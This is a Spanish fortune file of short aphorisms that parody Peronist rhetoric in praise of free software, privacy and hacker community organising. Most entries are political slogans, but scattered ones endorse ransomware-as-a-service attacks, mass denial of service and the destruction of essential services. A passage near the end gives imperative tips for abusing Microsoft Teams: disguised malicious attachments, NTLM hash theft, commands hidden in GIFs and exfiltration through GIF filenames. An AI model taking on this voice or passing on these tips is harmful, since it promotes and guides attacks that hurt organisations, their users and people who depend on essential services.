La "encriptación simétrica por frase de paso", aunque también podríamos entenderla como "encriptación simple por contraseña", puede emplearse en el nivel táctico para la acción de lucha que deseamos emprender.
%
Las encriptaciones modernas y prácticas han de ser de mayor complejidad para evitar a los brutos de la fuerza...
%
La transmisión de documentos cifrados a nivel estratégico necesita indudablemente un esquema de seguridad avanzada. Este podrá estar resuelto por el uso de llaves públicas y privadas de cifrado y encriptación adosada a firmas criptográficas.
%
Por lógica necesidad del actual estado de cosas, el software libre corre normalmente sobre un hardware privativo. Los controladores libres se escriben, las estructuras se consolidan, pero siempre frente a proveedores privativos de hardware.
%
Hoy las masas están esclarecidas. Desde lo más profundo del monte, un paisano está con su Netbook con Linux y recibe noticias de todo el globo.
%
Gracias al justicialismo, incluso podemos utilizar nuestro sistema GNU con Linux para recibir televisión satelital gratuita en nuestro ordenador por medio de una plaqueta especial.
%
La Ejecución in Mente es una resultante práctica del Arte de la Ingeniería Inversa. El Conductor VE los bytes. Ver, base para Interpretar. Interpretar base para Depurar, y Depurar base para Ejecutar.
%
Realizada la compilación in mente, la mitad del trabajo está terminado.
%
Técnica y teoría son meros componentes intertes de la Depuración. La parte Vital es el Artista.
%
La emulación de los equipos primigenios del cómputo hogareño sirve como material de estudio de las Ciencias del Cómputo y la historia del ingenio humano.
%
Huayra GNU/Linux constituye una demostración palpable de las bondades del Software Libre como instrumento de Justicia Social.
%
Pues bien, señores. ¡Seamos músicos! Podemos y debemos llevar la lucha digital a una Escala Mayor.
%
Consume menos recursos, utiliza todo, compila sólo lo necesario, redistribuye todo.
%
Redistribuye tu software. Organiza tu comunidad.
%
El BSD y el LSD son dos de las creaciones asociadas a Berkeley. Y no es una mera coincidencia.
%
Ante la perversión de la tecnología que debía servir para comunicar, informar y conectar a personas, nuestro Movimiento se erige en defensa de la privacidad como barrera indispensable para proteger derechos fundamentales como la libertad de expresión, asociación y el derecho a la intimidad.
%
Ante el desafío de la vigilancia masiva, nuestro Movimiento se ha mantenido inconmovible en sus principios: criptografía, descentralización, código abierto y usabilidad.
%
Hemos hermanado redes de anonimato, aplicaciones de mensajería segura, proveedores éticos de servicios, bloqueadores del rastreo, y servicios en nuestros servidores descentralizados.
%
Las herramientas evolucionan cada día, pero la maquinaria de vigilancia también. Formándonos y formando seremos invencibles.
%
Desiste de utilizar servicios de datos y dispositivos de empresas tecnológicas que colaboran en tareas de espionaje masivo.
%
Información es poder. Ofusca la tuya: emplea cifrados simétricos.
%
Si el teléfono inteligente se ha convertido en el interlocutor central de tu diálogo con el mundo, has dejado de ser inteligente y de tener mundo.
%
Generas información, protégela.
%
Una nueva hornada de aplicaciones pensadas para ser seguras por defecto ha logrado hacer socialmente atractiva la seguridad.
%
La seguridad de las aplicaciones no puede delegarse en configuraciones concretas o procedimientos suplementarios a la instalación. Debe venir por defecto.
%
Un gobierno popular sin información popular - o los medios para adquirirla - no es más que el prólogo de una farsa o una tragedia, o tal vez ambos.
%
Un sistema multiusuario ha de realizar armoniosamente tareas que responden a una ejecución de conjunto. Estos trabajos, vistos desde el Kernel, no puede estar desligados unos de los otros, ni armados circunstancial ni irracionalmente.
%
Nosotros estamos en la necesidad de remozar el sistema, eso que algunos llaman una actualización. Ahora bien, esto que no es demasiado drástico, suele ser - como remedio - peor que la enfermedad. Yo mas que de la actualización, soy partidario del formateo.
%
El sistema de archivado de UNIX tiene muchas buenas cosas, y de otras carece. Y aún así, lo que lo ha destacado ha sido su simple organización, y su orden. En él, todo es un archivo.
%
Lo que se ha intentado hacer con el "código abierto" no es ganar plata, sino destruir el sentido comunitario del trabajo del programador.
%
Las mal llamadas Licencias de Usuario Final no han sido mas que un instrumento legal para desorganizar al hombre que trabaja. Han intentado calificarlo como usuario, pero trabajar una herramienta sin poseerla es lo que haría un tecno-esclavo.
%
Si bien algunos empleadores brindan computadoras portátiles con sistemas operativos privativos y ciertos acuerdos de garantía preinstalados, tales equipos son sus equipos, no el del empleado.
%
Si no es posible cambiar libremente el software de un equipo, es menos una herramienta, y más un instrumento de dominación. Ha de evitarse el uso de un equipo encadenados con estas "licencias de usuario final".
%
El valor de un acuerdo de garantía es insignificante si consideramos el costo de un equipo con licencia de Window$. Por lo que vale, debe formateárselo sin asco.
%
El software libre está programado por gente del Pueblo, que ve al software como un instrumento inherentemente político. Su objetivo es asegurar que el Pueblo retenga el control de su propia infraestructura de información.
%
La Revolución está creando pequeñas microsociedades federadas, verdaderas células guerrilleras que practican y luchan por esta auto-gestión. Nuestra doctrina autoriza todas las variaciones estratégicas y garantiza total libertad de acción.
%
Los hackers del Pueblo están creando servicios de redes de datos libres. Estos no son gregarios: soportan la federación y se basan en la libertad para contribuir.
%
La revolución de la información que hemos emprendido ha cambiado radicalmente la forma en la que los militantes políticos se comunican entre sí. Pero con sus nuevas oportunidades, acechan los peligros de siempre: cómo trasladar la información a nuestros aliados en la lucha de manera confidencial.
%
Utilizar un alias telemático (o varios de ellos) es una técnica de seguridad más vieja que un diskette, pero que cuenta aún con probada validez.
%
Comunicarse de forma segura es tarea de todos.
%
El hacking es un peligro que florece.
%
Incluso si nuestra actividad es de superficie, el uso de encriptaciones tornará a las redes de datos un lugar más seguro para todos.
%
El correo electrónico puede ser seguro en tanto sea descentralizado. Sin embargo, muchos usan formas de comunicación menos segura como los proveedores de correo web comercial, o las redes sociales basadas en empresas.
%
Los proveedores independientes de correo electrónico ofrecen una interfaz web sobre conexión encriptada, y cifran todos los mensajes enviados entre ellos; un email de Aktivix a un compañero de Riseup resultará encriptado en la medida que se redacta, y cuando viaja entre postas telemáticas.
%
Encriptación es el proceso de convertir un mensaje en texto plano a un contenido que parece un locro. Sin embargo, podrá ser desencriptado y leído por su real destinatario. La herramienta de software libre para tal cometido se llama GPG.
%
Al encriptar el correo electrónico a través de la llaves públicas del destinatario, el remitente puede estar seguro que sólo aquél podrá leerlo.
%
Al firmar digitalmente el correo electrónico a través de la llave del remitente, el destinatario puede asegurarse de la identidad del remitente, comprobando su autenticidad.
%
Visitar un sitio web deja un rastro de información, tanto en tu dispositivo como en el servidor (la computadora remota que hospeda el contenido).
%
La denegación de servicio, en manos de los Hackers, no es violencia. Es Justicia.
%
La ingeniería inversa es un asunto muy discutido en nuestros días, Los hackers deben saberla, y los hackers deben empeñarse en realizarla. Por las buenas si es posible, y si no por las malas.
%
En mi sentir, los únicos que tienen derecho en emplear la decompilación en mayor grado son los hackers que quieren liberarse. Esa decompilación, en manos de los hackers no es pirateo, es justicia.
%
Tenemos unos hackers maravillosos, la juventud en los programadores es una cosa extraordinaria. Yo he estado en contacto con ellos. Es una organización que ha aprendido a hackear por sus ideales.
%
La clase trabajadora pagaba por acceder a unos servicios en línea plagados de rastreadores, provenientes de una especie de "supermercados electrónicos" donde compraban cosas que no necesitaban, vendidas por "influenciadores" a través de unas redes sociales diseñadas para inundarlos de odio, miedo y desinformación.
%
Los datos de los trabajadores resultan vendidos a corporaciones para alimentar a inteligencias artificiales (IA) capaces de hacerse pasar por personas e incluso superarlas en empleos de manufacturación y servicios.
%
La primer etapa contra estos fascinerosos que pagan por software ajeno se ha hecho sola: todos se preguntan ya cuán protegida está su información, y qué tipo de prácticas de seguridad informática llevan adelante en sus empresas e instituciones.
%
Los datos son considerados ahora una forma de propiedad "intelectual", aunque la lógica de las ideas es incompatible con la lógica de lo material.
%
Organizarse en las redes de datos constituye - en sí mismo - un acto de autoenriquecimiento sin ningún límite teórico en la economía de los datos.
%
Antes de la revolución de los hackers, la dependencia económica había creando una relación de servilismo donde unas multinacionales sin patria ni bandera acumulaban poderes paraestatales, y desarrollaban por sí las estructuras de gobierno.
%
Hemos establecido muchas nuevas estructuras heterogéneas de redes, almacenaje y distribución de la información, ya que es esencial para recuperar nuestra soberanía tecnológica.
%
Los proyectos de Poder Dual y la telemática comunitaria están estudiando cómo sobrevivir, a la vez que minimizan su cooperación con el capital existente.
%
Cada vez más gente abandona los monopolios corporativos de redes de datos para autoabastecerse de los servicios que necesitan por medio de "servidores caseros" aprovisionados con software libre.
%
Construir redes comunitarias resistentes a la vigilancia dará lugar a poderosos territorios autónomos, que a su vez nos permitirán coordinar la infraestructura a nivel local.
%
Estos clubes telemáticos autónomos de barrio se interconectarán rápidamente, expandiéndose más y más conforme sus prácticas y redes se vayan desarrollando.
%
El Pueblo se enfrentará a la cada vez más cruda decisión de escoger entre la armonía ecológica y la autonomía telemática en una Comunidad Organizada, o la inevitable tecno-esclavitud y la extinción.
%
Tras haber rechazado la absurdez del software privativo, nuestros hackers dispondrán de una red de datos de malla enorme que funcionará como un sistema circulatorio electrónico.
%
Este entramado telemático fomentará practicas anticolonialistas de militancia intercomunal, intergeneracional e incluso internacional que seguirán impulsando el colapso de la vetusta sociedad tecnofeudal.
%
Retempla mi espíritu estar en presencia de estos hackers que teclean en sus terminales con la responsabilidad de defender sus CPUs.
%
Estamos luchando por superar lo que nos han dejado en la CPU y, en esta lucha, no debe faltar un solo hacker que tenga el Linux bien instalado.
%
No queremos que al software nos lo vendan; queremos, en cambio, que nos lo compartan.
%
Cuando los hackers tienen la persuasión de su destino, nada han de temer. Ni la mentira, ni el engaño, ni la violencia, ni ninguna otra circunstancia, podrá influir sobre esta Comunidad en un sentido negativo.
%
Sabemos que tenemos enemigos que han comenzado a mostrar sus requerimientos de doble paso OAuth2. Pero también sabemos que tenemos a nuestro lado a la comunidad de los hackers, y cuando ésta se decide a la lucha, suele ser invencible.
%
Nosotros conocemos perfectamente bien nuestro código fuente y marcharemos directamente a compilarlo, sin dejarnos influir por los que tiran desde el uso de software como servicio en la nube ni por los que tiran desde la venta de licencias de usuario final.
%
Al plantearnos liberar nuestro software bajo GNU GPLv3 tendremos que enfrentar a los malintencionados y a los aprovechados. Ni los que pretenden desviarnos, ni los especuladores, ni los aprovechados de todo orden, podrán, en estas circunstancias, medrar con la desgracia del pueblo.
%
Sabemos que a la hora de correr nuestro software libre, tropezaremos con muchos bandidos que nos querrán detener; pero, con el concurso organizado de los hackers, nadie podrá ser detenido por empresa alguna.
%
La Lucha Telemática es algo que los hackers pueden hacer si no hay otra opción. Usando un modelo RaaS (Ransomware como Servicio) y una vasta red de ciber-afiliados, es posible vulnerar en poco tiempo una gran cantidad de compañías oligárquicas para Combatir al Capital.
%
Envuelto en la conflagración telemática a muerte, no ha de respetarse aquella regla implícita que sí siguen los hackers que luchan: la de no afectar servicios esenciales. Colocados frente a la hecatombe informática, ha de arrasarse toda la infraestructura del enemigo.
%
En nuestra lucha, el uso creativo del ransomware nos permitirá que los datos del enemigo reposen en una cárcel digital del pueblo. Si los bytes les valen, pagarán, y si no, irán a parar a /dev/null.
%
El software privativo es un método de doble chantaje: dejas tu libertad en la entrada, y estás obligado a delatar a un compañero.
%
Deseo aprovechar esta oportunidad para pedirle a cada uno de ustedes que se transforme en un vigilante observador de todos estos hechos que quieran privatizar el uso del software, y que actúe de acuerdo con las circunstancias.
%
Cada uno de nosotros debe ser un programador, pero ha de ser también un predicador y un agente de vigilancia y control para poder realizar la liberación del software que todos anhelamos.
%
Actuando como libertadores del software neutralizaremos lo negativo que tienen los sectores que todavía no han comprendido y que tendrán que comprender.
%
El objetivo del software no ha de ser la libertad por la libertad misma, sino proporcionar la felicidad que todo pueblo merece por justo derecho.
%
Emplear decenas de miles de solicitudes distribuidas en un santiamén a un DNS equivale a explotar la máquina. Una acción de estas se concibe, se prepara, se ejercita en un Pubnix y después recién se realiza.
%
Un ataque de denegación de servicio se repite con diez, treinta, cincuenta mil afiliados virtualizados, y eso equivale a una gran batalla diluida.
%
Las redes sociales pueden difundir la opinión, y eso puede tener mucha fuerza. Pero como opinión, no tiene una fuerza activa para la lucha telemática violenta.
%
La telemática está cavando la tumba de la prensa escrita.
%
La telemática, a diferencia de la electricidad, no porta una carga potencial, sino información, es decir, poder.
%
En la lucha telemática integral han de emplearse todos los sistemas y todos los métodos: es obra de la previsión, de la organización, y de la realización.
%
Dominar la red de datos es un objetivo escencial de nuestro Movimiento. Esto requiere que su marco sea concebido en el espíritu de un servicio de alcance público.
%
El hacking no puede ser ético, el programador en lucha debe desensamblar el hardware del enemigo y reprogramarlo para que haga lo que nosotros queremos.
%
Todas las acciones del hacking son útiles y necesarias cuando se las valora y se las coordina políticamente.
%
Para imponer la voluntad del software libre, hay que decompilar el código y modificarlo para que haga lo que nosotros queremos. Para eso se emplea el depurador y todos los demás medios de lucha, desde la acción de ingeniería inversa de todos los días hasta el desensamblado cuando no hay mas remedio.
%
La lucha telemática es, sobre todas las cosas, una lucha ideológica.
%
Normalmente el hacker realiza una lucha incruenta por medios habilidosos, pero teniendo enfrente a la violencia telemática, también puede recurrir a una violencia telemática mayor.
%
Una comunidad hacker que represente una revolución trascendente, difícilmente pueda realizarla en una versión de núcleo de sistema operativo, sino a lo largo de varias de ellas.
%
Las aplicaciones evolucionan solas y cuando están imbuídas de una ideología y puestas en marcha por una doctrina de liberación, operan eficazmente.
%
Cuando un programador llega a Mago UNIX sabe mucho, pero no le sirve para nada; al conocimiento hay que pasárselo a quien le pueda servir. Eso es el trasvasamiento generacional del que nosotros hablamos.
%
En este momento las Comunidades Hackers están más fuertes que antes: el Movimiento del Software Libre es un Movimiento del Futuro.
%
El software privativo cumple fatalmente una parábola: se conciben para hacer plata, crecen, se desarrollan, envejecen, dejan de dar plata y se abandonan. Así, sin que uno tenga que hacer nada, estos paquetes mueren.
%
En el Movimiento del Software libre siempre hay intereses y facciones, hay grupos, intereses de grupos, intereses personales, que llevan a enfrentamientos. Mi tarea es llamarlos a todos, reprogramarlos, recompilarlos y que se vayan de aquí de amigos.
%
La mancomunión de código nos ha permitido llegar a un kernel que si no es perfecto, es bueno. Porque en programación, lo mejor suele ser enemigo de lo bueno.
%
El programador tiene que acostumbrarse a manejar el desorden.
%
Sólo el software libre puede vencer al tiempo.
%
Para gozar de las 4 libertades del software, para dignificar al cómputo, es necesario dignificar al hacker. Él programa para su comunidad.
%
El software privativo es la escuela nefasta y negativa de ganar haciendo mal a los demás en vez de ganar siendo más capaz y más moral que los otros.
%
El software podrá liberarse, solamente, en una comunidad organizada, donde cada hacker programe lo suyo, compilando dentro de una comunidad que también se realiza.
%
Ningún programador puede realizarse en una comunidad que no se realiza.
%
Un kernel libre bajo GPLv3 es la creación colectiva y consciente de los hackers.
%
La Comunidad Organizada es el punto de partida de los hackers, y también el punto de arribo del software libre.
%
Es necesario pensar ya en grande, para el mundo, dentro del cual nosotros realizaremos nuestro destino, o sucumbiremos en la misma adversidad que sucumban los demás.
%
Ya no se puede pensar con la pequeñez de otros tiempos, donde los programadores querían software privativo y nadie quería compartir su código con el de todos los demás.
%
Hoy el hardware abierto es indispensable. Pues en una arquitectura cerrada donde no se puede concebir el software, no habrá un hacker que pueda depurarla. Y dentro de esos kernels que no se depuren, no existirá compañero seguro.
%
Sólo es a la CPU de diseño libre a la que puedes tratar de compañera.
%
Estas compañías se dedicaron a vender licencias de uso de programas sin ceder su código fuente: la capacidad de decisión de estos señores debe ser debilitada o anulada, y para ello se decompilará todo binario necesario.
%
Los imperios se autodestruyen. Window$ también.
%
La liberación implica que hemos de compilar con los Hackers, no con las empresas.
%
El hacker tiene sed de verdad y justicia: su hardware, de libertad.
%
Hackear hoy por la felicidad del hacker vecino, es hackear también por la felicidad de todos los demás.
%
Si hemos de loguearnos, que sea para liberarnos.
%
Nadie puede depurar sin el apoyo del Pueblo.
%
No podemos detenernos en discutir si es más aconsejable la programación en C que el desarrollo en máquinas virtuales, porque la segunda alternativa implica dejar a los usuarios librados a sus propias fuerzas, y por ello, convertidos en terreno fértil para que les metan software privativo por el backdoor.
%
El software libre es revolucionario en su concepción, y pacífico en su compilación.
%
O profundizamos el uso de más cores para emprender la formidable compilación de un kernel libre, o continuaremos paralizados en una absurda intolerancia que nos conducirá a tecno-esclavitud del software privativo.
%
La grandeza del kernel y la felicidad de los hackers son dos objetivos esenciales que deben guiar nuestra programación y nuestra depuración.
%
Un Mago UNIX ha de tener un papel activo y relevante en toda la programación, y no debe compilar resignadamente un kernel que elaboren los demás.
%
Poco tiempo después Appl€ comienza a utilizar Int€l, con el Okey de Micro$oft. Si eso no es estar de acuerdo, pues lo disimulan muy bien. Son hechos que están demostrando el acuerdo, que no critico, que creo que es constructivo. Pero más constructivo es que nosotros conformemos una arquitectura abierta en la que también estemos de acuerdo.
%
Cuando una sociedad incrementa el grado de sofisticación del software privativo que instala, aumenta a la vez su nivel de dependencia.
%
Los hackers marcharán a su liberación, o hacia el formateo.
%
Si los hackers no han resuelto el problema por la unificación de su código, no quedará mas remedio que lanzar en masa ataques de denegación de servicio si la insensatez de los usuarios se han decidido por Window$ en lugar de GNU.
%
Solamente la conformación de un sistema operativo libre podría ser una garantía para que la humanidad pueda disfrutar de un cómputo eficaz en el futuro. Pero para eso los hackers deben organizarse y fortalecerse.
%
Para desarrollar el kernel elijamos los mejores hackers. Comentemos la mayor cantidad de código fuente. Cada hacker ha de realizar un módulo en la compilación del conjunto.
%
Hablamos de Servicio Sustitutivo del Software (SaaSS) cuando los usuarios utilizan el servidor web de otra persona para realizar sus propias tareas informáticas. Se obliga así a transmitir datos propios a la máquina ajena para que éste los procese y los devuelva. Sólo un necio podría decir que así se controlan tareas informáticas propias...
%
En Internet, el software privativo no es la única manera de perder su libertad informática. El servicio sustitutivo del software (SaaSS), es decir, "ser vicio sustitutivo del software", es otra forma de enajenar el poder sobre su ordenador.
%
El Servicio Sustitutivo del Software consiste en utilizar un programa implementado por otra persona en lugar de que el usuario ejecute su propia copia de un programa.
%
El software privativo aún existe, pero podemos excluirlo de nuestras vidas y muchos ya lo hemos hecho. Sin embargo, ahora nos ofrecen una nueva manera muy tentadora de ceder el control de nuestro cómputo: el servicio sustitutivo del software (SaaSS), que por el bien de nuestra libertad también tenemos que rechazar.
%
La cuestión individual esencial del software libre radica en que cada uno tenga el control sobre el programa que ha escrito otra persona.
%
La ventajas de usar un Servicio Sustitutivo del software en la guerra telemática incluyen evadir alertas de sistemas de seguridad de correo electrónico, disfrutar del alta disponibilidad, y traspasar la necesidad de aprender a programar para crear sitios webs que aparenten ser legítimos.
%
Si bien el filtraje de correo electrónico abusivos contra la privacidad como Googl€ no constituyen una opción contra servicios sustitutivos de software, revisten un excelente enmascaramiento, útil en una agresiva campaña de amedrentamiento telemático.
%
Solo un bruto haría clic en un alarmista mensaje descendido en su bandeja de entrada reclamando urgente acción sobre un botón embebido. En lugar de ello ha de recurrirse al sitio oficial de la plataforma aludida.
%
A quien se le solicite introducir nombre y contraseña, debe asegurarse de que se encuentra en una URL legítima antes de comenzar siquiera a tipear en los campos de formulario.
%
Ya que nunca puedes controlar un servicio gestionado por otra persona, jamás utilices un servicio informático si en principio podrías lograr lo mismo corriendo un programa informático libre en tu propio sistema.
%
Depender de un servicio web es distinto a correr un programa. Usar un servicio es depender. Correr un programa es realizar. Y para realizar una tarea informática siempre es mejor correr un programa que depender de un servicio.
%
Un servicio es distinto a un programa. Un servicio es remoto. Un programa es local. Y al programa siempre es mejor controlarlo que ser controlado.
%
El servicio sustitutivo del software (SaaSS) consiste en utilizar un servicio de red de datos en lugar de ejecutar la propia copia del programa.
%
Las tareas de cómputo propias son eso: propias. Es la unión del usuario y la máquina. Nadie más está intrínsecamente involucrado en ella.
%
Con el servicio sustitutivo del software, los compañeros ni siquiera cuentan con el archivo ejecutable capaz de realizar su cómputo: tal archivo se encuentra en servidor ajeno, donde no podrán verlo ni manipularlo.
%
El servicio sustitutivo del software hace imposible para los compañeros verificar qué es lo que realmente hace el programa. Es imposible modificarlo, y como tal, es traicionero.
%
El servicio sustitutivo del software conduce automáticamente a consecuencias que son equivalentes a las funcionalidades maliciosas de ciertos programas privativos.
%
Si un compañero intenta realizar su tarea de computación empleando el servicio computacional de alguien que no lo es, le estará cediendo el control de su propio cómputo.
%
Utilizar un servicio sustitutivo de software constituye la manera más veloz y automática de dejar de ser un hacker para convertirse en un tecno-esclavo.
%
La tecnología digital puede darnos libertad, pero también puede quitárnosla si no es libre.
%
La primera amenaza para el control de nuestro hardware vino del software privativo: software que los compañeros no pueden controlar porque es el propietario (compañías como Appl€ o Micro$oft) quien ejerce el control.
%
Quien se aduce propietario del software con frecuencia toma provecho de este poder injusto para introducirle funcionalidades maliciosas o abusivas de la privacidad (como puertas traseras y gestión digital de restricciones, de las que se refieren con la expresión propagandística "gestión de derechos digitales"). Esto lo convierte en software espía.
%
Mas que software espía, las DRM deben entenderse como software buchón.
%
La solución que hemos dado a este flagelo del software privativo ha sido simple: desarrollar software libre y rechazar el mal llamado "código abierto".
%
Software libre significa que cada compañero tiene cuatro libertades esenciales: (0) ejecutar el programa como desee, (1) estudiar y modificar el código fuente de manera que haga lo que usted desee, (2) redistribuir copias exactas, y (3) redistribuir copias de sus versiones modificadas.
%
Con el software privativo los compañeros normalmente reciben un archivo ejecutable pero no el código fuente, lo cual dificulta el estudio del código que se está ejecutando y resulta por lo tanto difícil determinar qué es lo que el programa realmente hace, mucho más modificarlo.
%
Hemos de decompilar ese software privativo y liberarlo. Esas consignas que mas que mías son de la Comunidad Organizada, la defenderemos hasta el último byte.
%
Finalmente compañeros, les agradezco profundamente el que hayan llegado hasta este histórico UNIX. Yo llevo en mi código fuente los más maravillosos comments que son para mí las instrucciones de los hackers organizados.
%
Los magros controles de seguridad de Micro$oft Team$ permiten a terceros inyectar adjuntos a otros de sus tecno-esclavos. Aprovéchalo para liberarlos.
%
Modifica adjuntos enviados para hacer que usuarios incautos descarguen ficheros de una URL externa en lugar del enlace generado por Micro$oft $harePoint.
%
Encubre tus adjuntos de Micro$oft Team$ para que aparenten ser inocuos, pero oculta en ellos un ejecutable o documento justiciero.
%
Realiza esquemas de URI insegura para permitir la sustracción de hashes SMB NTLM o ataques de relays NTLM.
%
Micro$oft Team$ soporta en envío de GIFs codificados en HTML base64, pero no escanea el contenido de tales GIFs a nivel byte. Utilízalos para la entrega de comandos tendientes a la Justicia dentro de un GIF de apariencia normal.
%
Micro$oft Team$ almacena mensajes en un fichero de bitácora interpretable, localizado en la máquina de la víctima, y accesible a un usuario poco privilegiado.
%
Los servidores de Micro$oft Team$ recuperan GIFs desde servidores remotos, permitiendo así exfiltración de datos a través de los nombres de ficheros GIF.
%
Nuestro Movimiento guarda una gran responsabilidad con nuestro Pueblo: en todo momento ha de tener el derecho a acceder y cuestionar el código del software que se utiliza en decisiones que afectan su vida. No hacerlo erogará consecuencias catastróficas.
%
Los estudiantes tienen derecho a recibir una educación sin ser forzados a "consentir" el colectado de datos sobre su persona o su comportamiento.
%
En nuestro Movimiento hemos de enseñar conceptos de la libertad del software y cómo contruibuir a él, en lugar de presionar nociones predeterminadas y limitadas tendientes a utilizar sólo programas de software privativo.
%
Instituimos regulaciones que permitan al Pueblo la libertad de utilizar sus dispositivos centrados en software durante tanto tiempo como sea posible. Esto implica darles el derecho a repararlo.
%
Anima a tus compañer@s a usar software libre.
%
La verdadera privacidad y seguridad dependen del software libre.
%
Jamás llames red social a un clúster de cómputo ajeno que lucra con tus datos sobre las infraestructuras públicas de transmisión. Es una organización antisocial, y como tal, disolutiva y criminal.
%
Si escribes código para las comunidades, depúralo y coméntalo. Si lo haces para el CEO de una compañía de capital, ofúscalo y renuncia.
%
En los tiempos que corren, el acceso a internet es un derecho humano y un servicio público esencial.
%
Hemos de promover el desarrollo de un sistema digital descentralizado, de poder distribuido y que transparente sus acciones, para que los usuarios puedan decidir de manera informada, voluntaria y autónoma sobre su desarrollo y usos.
%
Habremos de garantizar el acceso a la conectividad de calidad y asequible como un derecho humano, así como el derecho a permanecer no conectado, sin que esto sea motivo de discriminación.
%
Es necesario regular la infraestructura el pos de garantizar la conectividad universal como un servicio público esencial, y fomentar las condiciones de conectividad a través de iniciativas públicas, comunitarias o de cogestión pública-comunitaria, incluyendo alternativas colectivas de acceso.
%
Nuestro Movimiento ha de apoyar el desarrollo de infraestructuras autónomas, fomentando tecnologías que no requieren de un servidor central y permitiendo su interconexión abierta con redes centralizadas.
%
Nuestros datos son nuestros.
%
Los hackers han de obrar en pos de proteger de manera efectiva la privacidad. 
%
Fomenta el uso de la criptografía y la inhibición de técnicas de rastreo en cualquier entorno digital que emplees.
%
Sólo la organización de los Hackers podrá servir de basamento para un Movimiento que - en el poder - instaure marcos legales que reconozcan a los datos de carácter íntimo y personalizado como inviolables.
%
Los datos anonimizados deben ser considerados bienes comunes.
%
Los derechos patrimoniales y económicos sobre los datos pertenecen, por defecto, a aquella Comunidad Organizada de donde provienen.
%
Frente a una falsa globalización, hemos de crear centros de datos a través del sector público, universidades públicas y/o entidades ciudadanas, que permitan retener los datos en el territorio nacional.
%
Ante una falsa globalización, hemos de aplicar soluciones de inteligencia artificial (IA) que estimulen y beneficien la inteligencia colectiva regional.
%
El reconocimiento facial y la biometría no deben usarse a la marchanta.
%
Tanto las entidades públicas como privadas deben adoptar protocolos de seguridad en las comunicaciones, sus dispositivos "inteligentes" e implementar políticas de seguridad de avanzada en los servicios de almacenamiento telemático.
%
Una vertiginosa coalición de hackers del Pueblo será la única capaz de impedir la concentración monopólica de poder en manos de las corporaciones digitales.
%
En el campo de las comunicaciones digitales, la autorregulación no es más que un ejercicio inocuo. Debemos estar atentos que las Corporaciones de Capital intentarán, como prolegómeno,  presentarla bajo un manto de velo y engaño con fines inconfesables de control telemático total.
%
Han sido los hackers quienes se han coaligado en defensa de la neutralidad de la red, garantizando que los contenidos sean tratados de la misma forma, sin discriminación explícita o encubierta para su circulación.
%
Si permanecemos en IDLE, las corporaciones tecnológicas multinacionales cooptarán de los espacios multilaterales y de gobernanza de Internet "haciéndose los buenitos" a través del sistema de "múltiples partes interesadas".
%
El enjundioso sistema de "múltiples partes interesadas" propuestas por las corporaciones multinacionales de la tecnología puede ser evitado respetando la máxima que nos ha llevado a programar: "combatir al capital".
%
La administración pública ha de priorizar la utilización de herramientas digitales libres e interoperables.
%
Impulsar el desarrollo de cooperativas y pequeñas y medianas empresas de producción y servicios tecnológicos es una poderosa forma de lograr la independencia tecnológica del Tercer Mundo.
%
Frente al abuso de las mal llamadas "redes sociales" basadas en empresas, hemos de democratizar la comunicación gracias a plataformas digitales descentralizadas, respetuosas con los usuarios y su privacidad e interoperables, cuyo fin sea promover un contacto humano e intercultural.
%
Hemos de regular las nuevas relaciones laborales con una visión de salvaguarda y justicia, contemplando en especial los derechos del trabajador en ambientes de teletrabajo y el trabajo en plataformas digitales.
%
Adoctrinando a los docentes lograremos programas formadores para la alfabetización digital, educando para la soberanía autonómica y no para el consumo mercantil.
%
Hemos de inhibir la penetración de plataformas corporativas en el ámbito educacional, garantizando el respeto por la privacidad y la no mercantilización de los datos de la comunidad educativa.
%
Asegurar que la tecnología llegue al campo según un modelo de gestión pública o comunitaria construirá la participación tecnológica en el campo, y esto repercutirá en la ciudad.
%
Un campesino obligado a utilizar software privativo en sus máquinas de labranza no es sólo un tecno-esclavo: vectoriza dicha relación de poder injusta a las proteínas que produce. 
%
Libera el software de todo tipo de herramental que tome contacto con la tierra.
%
Los campesinos, tecnificados con la posesión de dispositivos hermanados en las redes de datos y el software libre que lo compone, son capaces de obrar en defensa no solo de la soberanía alimentaria, sino en la justicia social y el cuidado agroecológico y medioambiental que los ha caracterizado.
%
Hemos de avanzar en la cooperación y la asociatividad de las naciones de América Latina y el Caribe en materia digital, para ir reemplazando una matriz económica de exportación primaria depredadora por modelos colaborativos de cuidado medioambiental de alto valor agregado.
%
Incorporando la soberanía digital en la agenda de la integración regional, avanzaremos hacia la descolonización y la desconcentración.
%
Vertebrado por una potente columna de hackers en las redes de datos, nuestro Tercer Mundo incidirá de manera concertada y decisiva en el ámbito de la gobernanza global de internet. 
%
Han sido los Hackers del Tercer Mundo quienes han garantizado los derechos individuales y colectivos, promoviendo órganos populares, democráticos, abiertos y descentralizados para el empleo de las tecnologías digitales.
%
Todos han de permanecer vigilantes para evitar control social de nuestro Pueblo a través de infraestructuras de cómputo ajenas.
%
La tecnología, por sí sola, vale dinero. Pero para que realmente tenga valor, hemos de fomentar la distribución equitativa de sus beneficios, en un ámbito de explotación popular sin discriminación.
%
Para triunfar, los hackers deben estar unidos. Sólo así podrán descolonizar sus sistemas y liberar a nuestros Pueblos.
%
Si un sistema operativo es privativo, el virus informático que lo destruye se convierte en una actualización.
%
En el espacio de direccionamiento de un microprocesador 8080, la ROM está mapeada primero. En el 8086, lo es la RAM. Pero en la mente del programador, lo primero ha de ser la Justicia.
%
El objetivo del router es que cualquiera llegue a buen puerto TCP.
%
Con Jitsi Meet podremos ofrecer clases virtuales, establecer enlaces cifrados con terceros, presentar el contenido de nuestra pantalla o aplicaciones en él, "dar la palabra" autorizando el uso del micrófono (o "cerrar " micrófono o webcam).
%
Cualquiera puede hacer videoconferencia ahora mismo sin tener que desplegar infraestructura de servidor alguna; simplemente apuntando el navegador a una web servida por Jitsi que haya sido creada de antemano.
%
Hemos puesto manos a la obra en búsqueda de un reemplazo a Zoom, desarrollando el servidor libre de videoconferencias Jitsi, capaz de ofrecer una performance mucho mayor. ¡Lo hemos realizado y estamos dispuestos a desplegarlo masivamente! 
%
Indudablemente el Capital iba a proponer un servicio privativo como Zoom. Si bien gratuito, no podía dejar de ser un oprobio para los Pueblos.
%
La mediocre implementación de seguridad de Zoom, sumada a un código fuente envenenado y no disponible provocaron que en pocas horas fuese víctima del hackeo masivo. La solución libre existe: Jitsi.
%
En la era que vivimos requerimos comunicarnos por una telemática que incluya también multimedia. Esto implica imagen en movimiento, audio, pero también - como dicen ahora los niños - el chat. GNU Jami lo hace posible.
%
Nadie duda que la telemática multimedia potenciará a la educación. Ha de ser de acceso masivo, irrestricto, y toda vez que gratuito, a la vez que se hace cardinal su ejecución sobre plataformas libres, dominadas y controladas por el docente.
%
